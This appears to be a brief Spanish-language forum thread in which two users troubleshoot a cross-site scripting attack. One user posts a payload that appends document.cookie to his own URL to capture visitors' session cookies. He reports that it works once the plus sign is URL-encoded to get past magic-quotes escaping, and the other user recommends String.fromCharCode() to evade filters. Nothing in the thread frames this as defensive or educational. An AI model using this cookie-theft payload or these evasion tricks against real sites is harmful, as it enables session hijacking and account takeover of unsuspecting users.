XSS Help!!!

Iniciado por [{O_o}], 10 Febrero 2010, 17:15 PM

0 Miembros y 3 Visitantes están viendo este tema.

~ Yoya ~

Ok, no pasa nada, pero yo creo que se porque no podias hacerlo, ps pueda ser que el servidor tuviera On las magic quotes gpc que te escapaba las comillas dobles y simples por barras invertidas, siempre trata de ver el codigo de fuente y mira que pasa con lo que vas inyectando.
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

[{O_o}]

yo lo prove concatenando el la url + el cookie
de este manera

"miurl.com"+document.cookie;
y despues probe

"miurl.com"%2bdocument.cookie; y asi si funciona!
es por el magic quote. gracias no mantenemos en conctato!


~ Yoya ~

Bueno tambien, eso se llama url encoding, pero si alguna vez en cuentra otro XSS y no te funciona encodear la url por, ps te toca usar String.fromCharCode()
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.